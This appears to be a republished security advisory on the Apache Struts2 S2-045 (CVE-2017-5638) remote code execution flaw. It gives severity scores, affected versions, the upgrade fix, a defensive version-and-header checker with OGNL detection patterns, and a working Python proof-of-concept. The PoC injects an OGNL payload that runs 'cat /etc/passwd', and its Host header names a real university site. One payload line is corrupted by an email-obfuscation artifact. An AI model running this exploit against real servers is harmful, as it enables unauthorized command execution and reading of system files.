Apache Struts2 arbitrary code execution vulnerability disclosed (S2-045, CVE-2017-5638) - vulnerability warning - the black bar safety net
MYHACK58:62201784026
Mar 07, 2017 - 12:00 a.m.
佚名 (anonymous)
www.myhack58.com

10 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.975 High

EPSS

Percentile

100.0%

FreeBuf's last exposure of a Struts 2 vulnerability was already more than six months ago. This one is a remote code execution (RCE) vulnerability: put simply, a file upload handled by the Jakarta Multipart parser can be abused to execute code remotely. The vulnerability was reported by Nike Zheng of 安恒信息 (DBAPPSecurity).
Apache Struts is an open source MVC framework for building enterprise-class Java web applications, maintained by the Apache Software Foundation (United States).
Vulnerability number
CVE-2017-5638
Vulnerability description
The Jakarta Multipart parser used by Struts handles file upload requests improperly: a remote attacker who sends a crafted, malicious Content-Type header can cause remote command execution.
In fact, the default.properties file offers two values for struts.multipart.parser, jakarta and pell (originally there was also a third, cos). The jakarta parser is the standard component of the Struts 2 framework and is enabled by default, which is why the severity of this vulnerability must be taken seriously.
The scope of the impact
Struts 2.3.5 – Struts 2.3.31
Struts 2.5 – Struts 2.5.10
Solution
If you are using the Jakarta-based file upload Multipart resolver, upgrade to Apache Struts 2.3.32 or 2.5.10.1; alternatively, switch to a different implementation of the file upload Multipart resolver.
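As an added example that is not part of the original advisory, the following Python covers the two practical questions a defender has at this point: whether a deployed Struts version falls inside the affected ranges (and which release fixes it), and whether an incoming request's Content-Type header carries the OGNL expression marker that the description above refers to. The version ranges and fixed releases are taken from the advisory; the sample version strings, the sample request headers and the function names (`struts_status`, `inspect_headers`) are assumptions constructed for this example.

```python
# Added example, not code from the advisory: two defender-side checks for
# S2-045. The version ranges and fixed releases come from the advisory text;
# the sample version strings and request headers are constructed here.
import re

# (lowest affected, highest affected, fixed release) as stated in the advisory.
AFFECTED_RANGES = [
    ((2, 3, 5), (2, 3, 31), "2.3.32"),
    ((2, 5, 0), (2, 5, 10), "2.5.10.1"),
]


def parse_version(text):
    """Extract the numeric components of a version such as '2.5.10.1' or
    'Struts 2.3.31' into a tuple, padded to at least three parts so that
    '2.5' compares as (2, 5, 0). Four-part releases keep their fourth part,
    so 2.5.10.1 sorts after 2.5.10 and is correctly reported as fixed."""
    parts = [int(p) for p in re.findall(r"\d+", text)]
    if not parts:
        raise ValueError("no version digits in %r" % text)
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def struts_status(version_text):
    """Return (affected, fixed_release_or_None) for a Struts version string."""
    version = parse_version(version_text)
    for low, high, fix in AFFECTED_RANGES:
        if low <= version <= high:
            return True, fix
    return False, None


# OGNL expressions start with %{ or ${; a legitimate multipart Content-Type
# value never contains either sequence.
OGNL_MARKER = re.compile(r"[%$]\{")
# Tokens that show up in the published S2-045 payload shape.
SUSPICIOUS_TOKENS = ("#_memberAccess", "#context", "ognl", "ProcessBuilder")


def inspect_headers(headers):
    """Inspect one request's headers (dict of name -> value) and return a
    list of findings; an empty list means nothing looked like S2-045."""
    findings = []
    for name, value in headers.items():
        if name.lower() != "content-type":
            continue
        if OGNL_MARKER.search(value):
            hits = [t for t in SUSPICIOUS_TOKENS if t.lower() in value.lower()]
            findings.append({
                "header": name,
                "reason": "OGNL expression marker in Content-Type",
                "tokens": hits,
            })
    return findings


# Constructed sample requests: a normal browser upload and a crafted one.
BENIGN_REQUEST = {
    "Host": "example.invalid",
    "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryAbC123",
}
CRAFTED_REQUEST = {
    "Host": "example.invalid",
    "Content-Type": "%{(#x='multipart/form-data').(#_memberAccess=#dm).(#context)}",
}

if __name__ == "__main__":
    for v in ("2.3.4", "2.3.31", "2.3.32", "2.5", "2.5.10.1"):
        print("Struts %-8s affected=%s fix=%s" % ((v,) + struts_status(v)))
    for label, req in (("benign", BENIGN_REQUEST), ("crafted", CRAFTED_REQUEST)):
        print("%s request: %s" % (label, inspect_headers(req) or "no findings"))
```

Upgrading remains the fix; the header inspection is a stopgap filter for a WAF rule or for triaging access logs, and it looks only at the Content-Type header, which is the vector this advisory describes.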
Vulnerability PoC
```python
#!/usr/bin/env python
# encoding: utf-8
import urllib2
import sys
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers

header = {
    "Host": "alumnus.shu.edu.cn",
    "Connection": "keep-alive",
    "Refer": "alumnus.shu.edu.cn",
    "Accept": "/",
    "X-Requested-With": "XMLHttpRequest",
    "Accept-Encoding": "deflate",
    "Accept-Language": "zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4",
}

def poc():
    register_openers()
    # Build a multipart body so the request is routed through the Jakarta parser.
    datagen, headers = multipart_encode({"image1": open("tmp.txt", "rb")})
    header["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
    # The OGNL expression is carried in the Content-Type header value.
    header["Content-Type"] = (
        "%{(#nike='multipart/form-data')."
        "(#[email protected]@DEFAULT_MEMBER_ACCESS)."
        "(#_memberAccess?(#_memberAccess=#dm):"
        "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
        "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
        "(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear())."
        "(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd')."
        "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
        "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
        "(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true))."
        "(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse()."
        "getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
        "(#ros.flush())}"
    )
    request = urllib2.Request(str(sys.argv[1]), datagen, headers=header)
    response = urllib2.urlopen(request)
    print response.read()

poc()
```
